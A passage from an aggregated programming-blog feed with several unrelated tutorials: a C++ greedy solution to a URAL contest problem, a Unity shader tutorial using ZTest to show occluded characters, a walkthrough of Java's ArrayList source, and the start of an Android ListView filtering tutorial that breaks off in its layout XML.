In the first sample the dean can make any schedule with two subjects (even identical), but the quality of the schedule “za” is 26 − 1 = 25, and this is the maximum possible value of the quality.

In the second sample it is impossible to make a schedule consisting of two classes with three different subjects.

In the third sample the dean has only one variant. Though the schedule is bad (1 − 26 + 1 = −24), nothing better can be proposed.

In the fourth sample the only possible variant doesn’t contain three different subjects.
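The quality formula can be checked against the notes with a few lines of code. This is a small illustrative sketch, not part of the solution; the class name ScheduleQuality is made up here, and the input is assumed to be a fully filled schedule of lowercase letters.

```java
class ScheduleQuality {

    /** Quality of a filled schedule: odd places (1-based) add, even places subtract. */
    static int quality(String schedule) {
        int total = 0;
        for (int i = 0; i < schedule.length(); i++) {
            int importance = schedule.charAt(i) - 'a' + 1; // a = 1 ... z = 26
            // Index 0 is place 1, so even indices are the odd-numbered places.
            total += (i % 2 == 0) ? importance : -importance;
        }
        return total;
    }

    public static void main(String[] args) {
        System.out.println(quality("za"));  // 26 - 1 = 25
        System.out.println(quality("aza")); // 1 - 26 + 1 = -24
    }
}
```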

Source

UESTC 2016 Summer Training #17 Div.2

URAL 2026

My Solution

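Greedy, with a deque and two queues.

First scan the string and count how many times each letter occurs. Then scan the letter array from largest to smallest and record, in order, the letters that have not appeared.

During the scan, record each '?' at an odd place with qo.push(i) and each '?' at an even place with qe.push(i). If the number of '?' plus the number of distinct letters already present is less than k, output -1.

Otherwise a solution exists. Each step then uses if(26 - deq.front() > deq.back()) to decide whether to fill a minus place or a plus place first (checking first whether the corresponding queue is empty).

See the code for details.

Complexity: O(n)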

#include <iostream>
#include <cstdio>
#include <cstring>
#include <deque>
#include <queue>
using namespace std;
typedef long long LL;
const int maxn = 1e5 + 8;

char val[maxn];
int letter[26];

deque<int> deq;
queue<int> qe, qo;
int main()
{
    #ifdef LOCAL
    freopen("a.txt", "r", stdin);
    //freopen("b.txt", "w", stdout);
    int T = 5;
    while(T--){
    #endif // LOCAL
    memset(letter, 0, sizeof letter);
    int k, len, sz = 0, cnte = 0, cnto = 0;
    scanf("%s", val);
    len = strlen(val);
    scanf("%d", &k);
    for(int i = 0; i < len; i++){
        if(val[i] != '?'){
            letter[val[i] - 'a']++;
            if(letter[val[i] - 'a'] == 1) sz++;
        }
        else{
            if(i&1) qe.push(i);
            else qo.push(i);
        }
    }
    cnte = qe.size(), cnto = qo.size();
    //cout<<cnte<<" "<<cnto<<endl;
    if(sz + cnte + cnto < k) printf("-1");
    else if(cnte + cnto == 0) printf("%s", val);
    else{
            //cout<<cnt<<endl;
        for(int j = 26 - 1; j >= 0; j--){
            if(letter[j] == 0) deq.push_back(j);
        }
        while(sz < k){
            if(26 - deq.front() > deq.back()){
                if(!qe.empty()){
                    val[qe.front()] = (deq.back() + 'a');
                    deq.pop_back();
                    qe.pop();
                    sz++;
                }
                else{
                    val[qo.front()] = (deq.front() + 'a');
                    deq.pop_front();
                    qo.pop();
                    sz++;
                }
            }
            else{
                if(!qo.empty()){
                    val[qo.front()] = (deq.front() + 'a');
                    deq.pop_front();
                    qo.pop();
                    sz++;
                }
                else{
                    val[qe.front()] = (deq.back() + 'a');
                    deq.pop_back();
                    qe.pop();
                    sz++;
                }
            }
        }

        while(!qo.empty()){
            val[qo.front()] = 'z';
            qo.pop();
        }
        while(!qe.empty()){
            val[qe.front()] = 'a';
            qe.pop();
        }

        printf("%s", val);

    }
    #ifdef LOCAL
    printf("\n");
    deq.clear();
    while(!qe.empty()) qe.pop();
    while(!qo.empty()) qo.pop();
    }
    #endif // LOCAL
    return 0;
}

Thank you!

------from ProLights

Author: ProLightsfxjh, posted 2016/7/31 0:44:11

↧

Unity Shaders and Effects Cookbook (D-1): Setting ZTest for a See-Through Effect on Occluded Objects

July 31, 2016, 1:18 am


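Games often show this effect: the hero walks behind an obstacle, yet we can still see the hero's body through it, as if we had X-ray vision.

It is all a trick.

In fact, the programmer draws the hero model twice.

One pass draws the occluded part in a semi-transparent style.

The other pass draws the unoccluded part.

Let's implement it in Unity.

First create a new material, shader, and scene.

Set up the scene with one Cube and one Capsule.

Right now this is the most ordinary situation: the Capsule is hidden by the Cube.

Reposted from http://blog.csdn.net/huutu http://www.thisisgame.com.cn

Now modify the shader.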

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
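		ZTest greater  // Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off. The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one. Greater means the pixel is rendered only if its Z value is greater than the Z in the buffer, so the object behind is drawn over the one in front.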
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}

The only change is two lines added before CGPROGRAM, which set two things:

ZWrite On
ZTest greater

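ZWrite controls whether depth is written to the depth buffer. The default is On.

ZTest decides, by comparing depth, whether the current pixel's color is written to the color buffer, i.e. whether the current pixel color replaces the previous one.

It can take the following values:

Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off

The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one.

Here we use Greater, which means the pixel is rendered only if its Z value is greater than the Z in the buffer, so the object behind is drawn over the one in front.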
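The two comparisons can be modelled outside Unity in a few lines. The sketch below is a toy model in Java, not Unity or ShaderLab code: DepthTest and its passes method are invented for illustration, only two of the modes are modelled, and a larger Z is assumed to mean "farther from the camera", as in the description above.

```java
/** Toy model of the depth comparison; not Unity code. */
enum DepthTest {
    LEQUAL, GREATER;

    /** True if a fragment at fragmentZ passes against the value already in the depth buffer. */
    boolean passes(double fragmentZ, double bufferZ) {
        switch (this) {
            case LEQUAL:  return fragmentZ <= bufferZ;
            case GREATER: return fragmentZ > bufferZ;
            default:      throw new IllegalStateException("unknown mode");
        }
    }
}

class DepthTestDemo {
    public static void main(String[] args) {
        double cubeZ = 0.3;    // the Cube is nearer and already in the depth buffer
        double capsuleZ = 0.7; // the Capsule is farther away
        System.out.println(DepthTest.LEQUAL.passes(capsuleZ, cubeZ));  // false: hidden as usual
        System.out.println(DepthTest.GREATER.passes(capsuleZ, cubeZ)); // true: drawn over the Cube
    }
}
```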

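This gives the following result:

This is the first pass: the Capsule behind is drawn over the Cube in front.

Now for the second pass, which draws the unoccluded part.

Since that part is not occluded, the most ordinary approach will do: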

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
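		ZTest greater  // Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off. The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one. Greater means the pixel is rendered only if its Z value is greater than the Z in the buffer, so the object behind is drawn over the one in front.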
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
		
		// With ZTest greater set above, only the occluded part is rendered, so the pass below renders the unoccluded part.
		ZWrite On
		ZTest LEqual  // Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off. The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one.
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}


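The result now looks like this:

It looks as if the Capsule is in front of the Cube. That is exactly what the shader does, but we cannot use it in a game like this, because it would be very misleading.

Let's make the occluded part transparent, for an effect like hiding in the brush in LOL.

Next, modify the first pass to make it transparent.

To make it transparent, add the alpha keyword to the #pragma surface line, then set Alpha.

The final version is as follows: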

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
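		ZTest greater  // Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off. The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one. Greater means the pixel is rendered only if its Z value is greater than the Z in the buffer, so the object behind is drawn over the one in front.
		CGPROGRAM
		#pragma surface surf Lambert alpha 
		// alpha makes the occluded part render as transparent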

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = 0.5f; // set Alpha to 0.5
		}
		ENDCG
		
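		// With ZTest greater set above, only the occluded part is rendered, so the pass below renders the unoccluded part.
		ZWrite On
		ZTest LEqual  // Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off. The default is LEqual: if the Z value of the pixel being drawn is less than or equal to the value in the depth buffer, the new pixel color replaces the old one.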
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}

Final result

Sample project download:

http://pan.baidu.com/s/1pKT17sf

Author: cp790621656, posted 2016/7/31 1:18:16

↧

Java Source Code Study: ArrayList Source Code Walkthrough

August 1, 2016, 2:23 am


Meaning of the fields in the ArrayList class

/**
     * The array buffer into which the elements of the ArrayList are stored.
     * The capacity of the ArrayList is the length of this array buffer.
     */
    private transient Object[] elementData; // array that stores the elements

/**
     * The size of the ArrayList (the number of elements it contains).
     *
     * @serial
     */
    private int size; // number of elements in the array

/**
     * The maximum size of array to allocate.
     * Some VMs reserve some header words in an array.
     * Attempts to allocate larger arrays may result in
     * OutOfMemoryError: Requested array size exceeds VM limit
     */
    private static final int MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8; // upper limit for the array size: Integer.MAX_VALUE - 8

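ArrayList constructors
Creating an ArrayList without arguments creates an Object array of length 10 (in this version of the source).
With an int argument, it creates an Object array of the specified length.
With a Collection argument, it creates a list containing the elements of that collection, in the order returned by the collection's iterator.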

/**
     * Constructs an empty list with an initial capacity of ten.
     */
    public ArrayList() {
        this(10);
    }

/**
     * Constructs an empty list with the specified initial capacity.
     *
     * @param  initialCapacity  the initial capacity of the list
     * @throws IllegalArgumentException if the specified initial capacity
     *         is negative
     */
    public ArrayList(int initialCapacity) {
        super();
        if (initialCapacity < 0)
            throw new IllegalArgumentException("Illegal Capacity: "+
                                               initialCapacity);
        this.elementData = new Object[initialCapacity];
    }

/**
     * Constructs a list containing the elements of the specified
     * collection, in the order they are returned by the collection's
     * iterator.
     *
     * @param c the collection whose elements are to be placed into this list
     * @throws NullPointerException if the specified collection is null
     */
    public ArrayList(Collection<? extends E> c) {
        elementData = c.toArray();
        size = elementData.length;
        // c.toArray might (incorrectly) not return Object[] (see 6260652)
        if (elementData.getClass() != Object[].class)
            elementData = Arrays.copyOf(elementData, size, Object[].class);
    }

Commonly used methods

1). Arrays.copyOf(T[] original, int newLength): creates and returns a new array of the given length and copies the values of the original array into it.

public static <T> T[] copyOf(T[] original, int newLength) {
        return (T[]) copyOf(original, newLength, original.getClass());
    }

public static <T,U> T[] copyOf(U[] original, int newLength, Class<? extends T[]> newType) {
        T[] copy = ((Object)newType == (Object)Object[].class)
            ? (T[]) new Object[newLength]
            : (T[]) Array.newInstance(newType.getComponentType(), newLength);
        System.arraycopy(original, 0, copy, 0,
                         Math.min(original.length, newLength));
        return copy;
    }

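2). System.arraycopy(Object src, int srcPos, Object dest, int destPos, int length): this method is declared native, so it is implemented in the VM's C/C++ code. The implementation is not visible in the JDK's Java sources, but it can be read in the OpenJDK source. The underlying copy behaves like C's memmove(), so elements are copied and moved correctly even within the same array. It is also much faster than a hand-written copy loop, which makes it well suited to bulk array operations and the usual choice for copying large numbers of array elements. The parameters are as follows:
the first is the source array, the second is the starting index in the source array, the third is the destination array, the fourth is the starting index in the destination array, and the last is the number of elements to copy.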

public static native void arraycopy(Object src,  int  srcPos,
                                        Object dest, int destPos,
                                        int length);
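As a small illustration of copying within a single array, the sketch below shifts part of an array one slot to the right, which is the same call pattern ArrayList uses for inserts. The class and method names (ArrayCopyDemo, shiftRight) are made up for this example.

```java
import java.util.Arrays;

class ArrayCopyDemo {

    /** Shifts data[index..size-1] one slot to the right inside the same array. */
    static void shiftRight(int[] data, int index, int size) {
        // Source and destination overlap; arraycopy still copies correctly.
        System.arraycopy(data, index, data, index + 1, size - index);
    }

    public static void main(String[] args) {
        int[] data = {1, 2, 3, 4, 0}; // four used slots, one spare
        shiftRight(data, 1, 4);
        data[1] = 9;                  // the freed slot takes the new value
        System.out.println(Arrays.toString(data)); // [1, 9, 2, 3, 4]
    }
}
```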

trimToSize() method
This method creates a new array whose length equals the number of elements and points the list at it, which releases the unused space.

/**
     * Trims the capacity of this <tt>ArrayList</tt> instance to be the
     * list's current size.  An application can use this operation to minimize
     * the storage of an <tt>ArrayList</tt> instance.
     */
    public void trimToSize() {
        modCount++;
        int oldCapacity = elementData.length;
        if (size < oldCapacity) {
            elementData = Arrays.copyOf(elementData, size);
        }
    }

size() method
Returns an int: the number of elements in the list.

/**
     * Returns the number of elements in this list.
     *
     * @return the number of elements in this list
     */
    public int size() {
        return size;
    }

isEmpty() method
Returns a boolean: true if the number of elements is 0, otherwise false.

/**
     * Returns <tt>true</tt> if this list contains no elements.
     *
     * @return <tt>true</tt> if this list contains no elements
     */
    public boolean isEmpty() {
        return size == 0;
    }

contains(Object o) method
Returns a boolean. It calls indexOf(Object o) and checks whether the result is >= 0; indexOf is explained in detail below.

/**
     * Returns <tt>true</tt> if this list contains the specified element.
     * More formally, returns <tt>true</tt> if and only if this list contains
     * at least one element <tt>e</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;e==null&nbsp;:&nbsp;o.equals(e))</tt>.
     *
     * @param o element whose presence in this list is to be tested
     * @return <tt>true</tt> if this list contains the specified element
     */
    public boolean contains(Object o) {
        return indexOf(o) >= 0;
    }

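indexOf(Object o) method: forward search
Returns an int. It compares each element of the array with the given object in turn. If one is equal, it returns that element's index; otherwise it returns -1.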

/**
     * Returns the index of the first occurrence of the specified element
     * in this list, or -1 if this list does not contain the element.
     * More formally, returns the lowest index <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>,
     * or -1 if there is no such index.
     */
    public int indexOf(Object o) {
        if (o == null) {
            for (int i = 0; i < size; i++)
                if (elementData[i]==null)
                    return i;
        } else {
            for (int i = 0; i < size; i++)
                if (o.equals(elementData[i]))
                    return i;
        }
        return -1;
    }

lastIndexOf(Object o) method: backward search
Returns an int. It works like indexOf, except that it compares from back to front instead of front to back.

/**
     * Returns the index of the last occurrence of the specified element
     * in this list, or -1 if this list does not contain the element.
     * More formally, returns the highest index <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>,
     * or -1 if there is no such index.
     */
    public int lastIndexOf(Object o) {
        if (o == null) {
            for (int i = size-1; i >= 0; i--)
                if (elementData[i]==null)
                    return i;
        } else {
            for (int i = size-1; i >= 0; i--)
                if (o.equals(elementData[i]))
                    return i;
        }
        return -1;
    }

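clone() method
Returns an Object. The official description is a "shallow copy". My understanding is that a new ArrayList object is created to receive a copy of the backing array, but the element references still point to the same objects, so changing an element object through one list is visible through the other.
Adding, removing, or replacing elements in one list does not affect the other.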

/**
     * Returns a shallow copy of this <tt>ArrayList</tt> instance.  (The
     * elements themselves are not copied.)
     *
     * @return a clone of this <tt>ArrayList</tt> instance
     */
    public Object clone() {
        try {
            @SuppressWarnings("unchecked")
                ArrayList<E> v = (ArrayList<E>) super.clone();
            v.elementData = Arrays.copyOf(elementData, size);
            v.modCount = 0;
            return v;
        } catch (CloneNotSupportedException e) {
            // this shouldn't happen, since we are Cloneable
            throw new InternalError();
        }
    }
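A short sketch of what "shallow" means in practice. The helper shallowCopy and the class CloneDemo are names invented for this example; StringBuilder is used only because it is a mutable element type.

```java
import java.util.ArrayList;

class CloneDemo {

    /** Returns a shallow copy: a new list object that shares the element objects. */
    @SuppressWarnings("unchecked")
    static ArrayList<StringBuilder> shallowCopy(ArrayList<StringBuilder> list) {
        return (ArrayList<StringBuilder>) list.clone();
    }

    public static void main(String[] args) {
        ArrayList<StringBuilder> original = new ArrayList<>();
        original.add(new StringBuilder("a"));

        ArrayList<StringBuilder> copy = shallowCopy(original);
        copy.get(0).append("!");          // mutates the shared element object
        copy.add(new StringBuilder("b")); // changes only the copy's own array

        System.out.println(original); // [a!]
        System.out.println(copy);     // [a!, b]
    }
}
```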

toArray() method
Returns an Object[]. This method returns a copy of the backing array, trimmed to the number of elements.

/**
     * Returns an array containing all of the elements in this list
     * in proper sequence (from first to last element).
     *
     * <p>The returned array will be "safe" in that no references to it are
     * maintained by this list.  (In other words, this method must allocate
     * a new array).  The caller is thus free to modify the returned array.
     *
     * <p>This method acts as bridge between array-based and collection-based
     * APIs.
     *
     * @return an array containing all of the elements in this list in
     *         proper sequence
     */
    public Object[] toArray() {
        return Arrays.copyOf(elementData, size);
    }

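toArray(T[] a) method
Returns a T[]. If the passed array is shorter than the number of elements in the list, a new array is created and returned; its length is the number of elements and its runtime type is that of the passed array.
If the passed array's length equals the number of elements, the list's values are copied into it and the passed array is returned.
If its length is greater than the number of elements, then in addition to the copy, the element at index size of the passed array is set to null.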

/**
     * Returns an array containing all of the elements in this list in proper
     * sequence (from first to last element); the runtime type of the returned
     * array is that of the specified array.  If the list fits in the
     * specified array, it is returned therein.  Otherwise, a new array is
     * allocated with the runtime type of the specified array and the size of
     * this list.
     *
     * <p>If the list fits in the specified array with room to spare
     * (i.e., the array has more elements than the list), the element in
     * the array immediately following the end of the collection is set to
     * <tt>null</tt>.  (This is useful in determining the length of the
     * list <i>only</i> if the caller knows that the list does not contain
     * any null elements.)
     *
     * @param a the array into which the elements of the list are to
     *          be stored, if it is big enough; otherwise, a new array of the
     *          same runtime type is allocated for this purpose.
     * @return an array containing the elements of the list
     * @throws ArrayStoreException if the runtime type of the specified array
     *         is not a supertype of the runtime type of every element in
     *         this list
     * @throws NullPointerException if the specified array is null
     */
    @SuppressWarnings("unchecked")
    public <T> T[] toArray(T[] a) {
        if (a.length < size)
            // Make a new array of a's runtime type, but my contents:
            return (T[]) Arrays.copyOf(elementData, size, a.getClass());
        System.arraycopy(elementData, 0, a, 0, size);
        if (a.length > size)
            a[size] = null;
        return a;
    }
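The three cases can be seen side by side in a small sketch. ToArrayDemo and sample are illustrative names only.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

class ToArrayDemo {

    static List<String> sample() {
        return new ArrayList<>(Arrays.asList("x", "y"));
    }

    public static void main(String[] args) {
        List<String> list = sample();

        String[] tooSmall = new String[0];
        String[] fresh = list.toArray(tooSmall);  // too short: a new String[2] is allocated
        System.out.println(fresh != tooSmall);    // true

        String[] exact = new String[2];
        System.out.println(list.toArray(exact) == exact); // true: the same array is returned

        String[] larger = {"p", "q", "r", "s"};
        list.toArray(larger);                     // copies two elements, then nulls index 2
        System.out.println(Arrays.toString(larger)); // [x, y, null, s]
    }
}
```

Only the slot at index size is set to null; anything after it keeps its old value, as the last line shows.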

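get(int index) method
Returns E. This method first checks that the index is within range. If it is, the value at that index is returned; otherwise an exception is thrown.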

/**
     * Checks if the given index is in range.  If not, throws an appropriate
     * runtime exception.  This method does *not* check if the index is
     * negative: It is always used immediately prior to an array access,
     * which throws an ArrayIndexOutOfBoundsException if index is negative.
     */
    private void rangeCheck(int index) {
        if (index >= size)
            throw new IndexOutOfBoundsException(outOfBoundsMsg(index));
    }

/**
     * Returns the element at the specified position in this list.
     *
     * @param  index index of the element to return
     * @return the element at the specified position in this list
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E get(int index) {
        rangeCheck(index);

        return elementData(index);
    }

set(int index, E element) method
Returns E. It replaces the value at the specified index and returns the previous value.

/**
     * Replaces the element at the specified position in this list with
     * the specified element.
     *
     * @param index index of the element to replace
     * @param element element to be stored at the specified position
     * @return the element previously at the specified position
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E set(int index, E element) {
        rangeCheck(index);

        E oldValue = elementData(index);
        elementData[index] = element;
        return oldValue;
    }

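add(E e) method: appends to the end of the array
With a single argument, add first calls ensureCapacityInternal(), which checks whether the backing Object array has room for one more element. If not, a new, larger array is created and the value is stored in it; otherwise the value is stored in the existing array.
The growth rule: the new capacity is 1.5 times the old capacity. If that is still smaller than the required minimum capacity, the minimum capacity is used instead. A final check handles the maximum array length: if the new capacity exceeds MAX_ARRAY_SIZE, hugeCapacity() returns MAX_ARRAY_SIZE, or Integer.MAX_VALUE when the required minimum itself exceeds MAX_ARRAY_SIZE.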

/**
     * Appends the specified element to the end of this list.
     *
     * @param e element to be appended to this list
     * @return <tt>true</tt> (as specified by {@link Collection#add})
     */
    public boolean add(E e) {
        ensureCapacityInternal(size + 1);  // Increments modCount!!
        elementData[size++] = e;
        return true;
    }

/**
     * Increases the capacity to ensure that it can hold at least the
     * number of elements specified by the minimum capacity argument.
     *
     * @param minCapacity the desired minimum capacity
     */
    private void grow(int minCapacity) {
        // overflow-conscious code
        int oldCapacity = elementData.length;
        int newCapacity = oldCapacity + (oldCapacity >> 1);
        if (newCapacity - minCapacity < 0)
            newCapacity = minCapacity;
        if (newCapacity - MAX_ARRAY_SIZE > 0)
            newCapacity = hugeCapacity(minCapacity);
        // minCapacity is usually close to size, so this is a win:
        elementData = Arrays.copyOf(elementData, newCapacity);
    }

private void ensureCapacityInternal(int minCapacity) {
        modCount++;
        // overflow-conscious code
        if (minCapacity - elementData.length > 0)
            grow(minCapacity);
    }

private static int hugeCapacity(int minCapacity) {
        if (minCapacity < 0) // overflow
            throw new OutOfMemoryError();
        return (minCapacity > MAX_ARRAY_SIZE) ?
            Integer.MAX_VALUE :
            MAX_ARRAY_SIZE;
    }
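The capacity arithmetic can be tried out without allocating any arrays. The sketch below copies only the calculations from grow() and hugeCapacity() shown above; the class GrowthRule and the method newCapacity are names invented for this example.

```java
class GrowthRule {

    static final int MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8;

    /** Mirrors the arithmetic of grow() and hugeCapacity() without allocating anything. */
    static int newCapacity(int oldCapacity, int minCapacity) {
        int newCapacity = oldCapacity + (oldCapacity >> 1); // 1.5x, rounded down
        if (newCapacity - minCapacity < 0)
            newCapacity = minCapacity;
        if (newCapacity - MAX_ARRAY_SIZE > 0) {
            if (minCapacity < 0) // int overflow
                throw new OutOfMemoryError();
            newCapacity = (minCapacity > MAX_ARRAY_SIZE) ? Integer.MAX_VALUE : MAX_ARRAY_SIZE;
        }
        return newCapacity;
    }

    public static void main(String[] args) {
        System.out.println(newCapacity(10, 11)); // 15
        System.out.println(newCapacity(15, 16)); // 22
        System.out.println(newCapacity(0, 1));   // 1
        System.out.println(newCapacity(10, 40)); // 40
    }
}
```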

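add(int index, E element) method: inserts at a given position
First the insert position is validated. Then capacity is ensured in the same way as above, growing the array if needed. System.arraycopy then shifts the elements from index onward one position to the right within the same array, and the new value is stored at index. Because there is now one more element, the ArrayList's size is incremented by 1.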

/**
     * Inserts the specified element at the specified position in this
     * list. Shifts the element currently at that position (if any) and
     * any subsequent elements to the right (adds one to their indices).
     *
     * @param index index at which the specified element is to be inserted
     * @param element element to be inserted
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public void add(int index, E element) {
        rangeCheckForAdd(index);

        ensureCapacityInternal(size + 1);  // Increments modCount!!
        System.arraycopy(elementData, index, elementData, index + 1,
                         size - index);
        elementData[index] = element;
        size++;
    }

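remove(int index) method: removes the element at the given index
Returns E. It first validates the index and fetches the current element. It then computes how many elements System.arraycopy must move: copying starts from the element after index, so the count is size - index - 1, and without the -1 the copy would run past the end. Every element after the removed one moves forward one position, which leaves a stale value in the last slot, so the last slot is set to null.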

/**
     * Removes the element at the specified position in this list.
     * Shifts any subsequent elements to the left (subtracts one from their
     * indices).
     *
     * @param index the index of the element to be removed
     * @return the element that was removed from the list
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E remove(int index) {
        rangeCheck(index);

        modCount++;
        E oldValue = elementData(index);

        int numMoved = size - index - 1;
        if (numMoved > 0)
            System.arraycopy(elementData, index+1, elementData, index,
                             numMoved);
        elementData[--size] = null; // Let gc do its work

        return oldValue;
    }

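remove(Object o) method: removes an element by object
Returns a boolean. If the given object is in the array, it is removed in the same way as in remove(int index) and true is returned; otherwise false is returned.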

/**
     * Removes the first occurrence of the specified element from this list,
     * if it is present.  If the list does not contain the element, it is
     * unchanged.  More formally, removes the element with the lowest index
     * <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>
     * (if such an element exists).  Returns <tt>true</tt> if this list
     * contained the specified element (or equivalently, if this list
     * changed as a result of the call).
     *
     * @param o element to be removed from this list, if present
     * @return <tt>true</tt> if this list contained the specified element
     */
    public boolean remove(Object o) {
        if (o == null) {
            for (int index = 0; index < size; index++)
                if (elementData[index] == null) {
                    fastRemove(index);
                    return true;
                }
        } else {
            for (int index = 0; index < size; index++)
                if (o.equals(elementData[index])) {
                    fastRemove(index);
                    return true;
                }
        }
        return false;
    }

/*
     * Private remove method that skips bounds checking and does not
     * return the value removed.
     */
    private void fastRemove(int index) {
        modCount++;
        int numMoved = size - index - 1;
        if (numMoved > 0)
            System.arraycopy(elementData, index+1, elementData, index,
                             numMoved);
        elementData[--size] = null; // Let gc do its work
    }
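The two remove overloads are easy to mix up on a list of Integer values, so here is a brief sketch of both. RemoveOverloads and sample are names chosen for this example.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

class RemoveOverloads {

    static List<Integer> sample() {
        return new ArrayList<>(Arrays.asList(10, 20, 30));
    }

    public static void main(String[] args) {
        List<Integer> byIndex = sample();
        Integer removed = byIndex.remove(1);         // remove(int index): returns the old element
        System.out.println(removed + " " + byIndex); // 20 [10, 30]

        List<Integer> byValue = sample();
        boolean found = byValue.remove(Integer.valueOf(30)); // remove(Object o)
        System.out.println(found + " " + byValue);           // true [10, 20]

        System.out.println(byValue.remove(Integer.valueOf(99))); // false: list unchanged
    }
}
```

Passing a plain int literal selects remove(int index); wrapping the value with Integer.valueOf selects remove(Object o).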

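clear() method
This method empties the list, i.e. clears the array. Note that it does not change the length of the backing array; it only sets the used slots to null.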

/**
     * Removes all of the elements from this list.  The list will
     * be empty after this call returns.
     */
    public void clear() {
        modCount++;

        // Let gc do its work
        for (int i = 0; i < size; i++)
            elementData[i] = null;

        size = 0;
    }

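Notes
A collection can hold only object references, not primitive values. Primitives must be wrapped in their wrapper classes before they can be added to a collection (autoboxing does this automatically).
Internally the elements are stored as Object. With a raw ArrayList, what comes out is also Object and must be cast back to its real type (the type that was put in); with generics, the compiler inserts that cast.

Summary
Reading the ArrayList source shows that ArrayList is backed by an array, and that add grows the capacity by allocating a new, larger array.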

Author: yin_Pisces, posted 2016/8/1 2:23:17

↧

Implementing ListView Filtering on Android: Advanced Version Extending BaseAdapter

August 1, 2016, 2:53 am


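The most convenient way to filter a ListView is to use ArrayAdapter, whose built-in getFilter() method makes this easy.

In real projects, however, ArrayAdapter sometimes cannot meet our requirements, so we usually extend BaseAdapter. An adapter that extends BaseAdapter cannot filter the ListView simply through ListView's setFilterText() the way ArrayAdapter can; we have to implement the Filterable interface ourselves and define the filtering rule.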
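To make "define the filtering rule" concrete, here is a plain-Java sketch of one possible rule: a case-insensitive substring match. It is an assumption for illustration, not the rule used in this article, and TitleFilter and apply are hypothetical names. In an Android adapter this logic would typically sit inside Filter.performFiltering(CharSequence), with the matches handed back to the adapter in publishResults.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;

/** Plain-Java sketch of a filtering rule; the class and method names are hypothetical. */
class TitleFilter {

    /** Returns the items containing the constraint, ignoring case; an empty constraint keeps all. */
    static List<String> apply(List<String> all, CharSequence constraint) {
        if (constraint == null || constraint.length() == 0) {
            return new ArrayList<>(all);
        }
        String needle = constraint.toString().toLowerCase(Locale.ROOT);
        List<String> matches = new ArrayList<>();
        for (String item : all) {
            if (item.toLowerCase(Locale.ROOT).contains(needle)) {
                matches.add(item);
            }
        }
        return matches;
    }

    public static void main(String[] args) {
        List<String> data = Arrays.asList("Android", "Java", "JavaScript");
        System.out.println(apply(data, "java")); // [Java, JavaScript]
        System.out.println(apply(data, ""));     // [Android, Java, JavaScript]
    }
}
```

The method returns a new list instead of modifying the input, so the adapter can keep the full data set and restore it when the search box is cleared.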

First, a screenshot of the result

Now straight to the code
* First, the layout file

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
              android:layout_width="match_parent"
              android:layout_height="match_parent"
              android:background="@color/white"
              android:orientation="vertical"
    >

    <LinearLayout
        android:id="@+id/search_top_layout"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_alignParentTop="true"
